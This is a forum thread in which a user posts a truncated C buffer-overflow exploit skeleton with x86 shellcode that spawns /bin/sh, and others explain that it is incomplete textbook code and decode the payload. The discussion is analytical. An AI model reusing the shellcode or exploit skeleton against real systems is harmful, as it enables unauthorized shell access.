Sign in to follow this  
Followers 0
Phr34kn_Phantom

Buffer Overflow

7 posts in this topic

Recently a friend of mine was banned from a game server and the forums. I believe this is the code. I'm pretty sure it's C. He's also been framed for hacking the forums of that community and another's. I know for a fact that he didn't due to his lack of any computer skills what so ever... Does this code here help his case? Is there anything that can be done on this?

#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90

char shellcode[] =

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";


unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

0

Share this post


Link to post
Share on other sites

This code isn't anything. First, it's incomplete. Second, it looks like a piece of boilerplate or textbook example buffer overflow code. This most certainly isn't an exploit for anything.

Though I don't know what the payload does. Who wants to run that through a disassembler?

0

Share this post


Link to post
Share on other sites
Looks like it does an exec("/bin/sh")

How can you tell?

0

Share this post


Link to post
Share on other sites
Looks like it does an exec("/bin/sh")

How can you tell?

http://www.dolcevie.com/js/converter.html

Hex:

eb:1a:5e:31:c0:88:46:07:8d:1e:89:5e:08:89:46:0c:b0:0b:89:f3:8d:4e:08:8d:56:0c:cd:80:e8:e1:ff:ff:ff:2

f:62:69:6e:2f:73:68

ASCII:

??^1??F????^??F??????N??V????????/bin/sh

It's not hard to predict that since it's named "shellcode", it's probably supposed to start a shell. I can safely bet that the rest of it is a compiled call to some system exec function, and /bin/sh is the argument.

Also, it's worth mentioning that the quoted piece of code won't do anything besides maybe informing the person who runs it that it couldn't allocate memory.

Edited by WhatChout
0

Share this post


Link to post
Share on other sites

another handy tool is ndisasm which comes with nasm. Nasm isn't my choice of assembler for various personal reasons, but ndisasm will take straight hex encoded machine code and output the mnemonics for you.

0

Share this post


Link to post
Share on other sites
Looks like it does an exec("/bin/sh")

How can you tell?

It's not hard to predict that since it's named "shellcode", it's probably supposed to start a shell. I can safely bet that the rest of it is a compiled call to some system exec function, and /bin/sh is the argument.

To be sure you could check the Intel Software Developer's Manual Volume 2: Instruction Set Reference, Appendix A: Opcode map.

Link: http://developer.intel.com/design/pentium/manuals/243191.htm

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0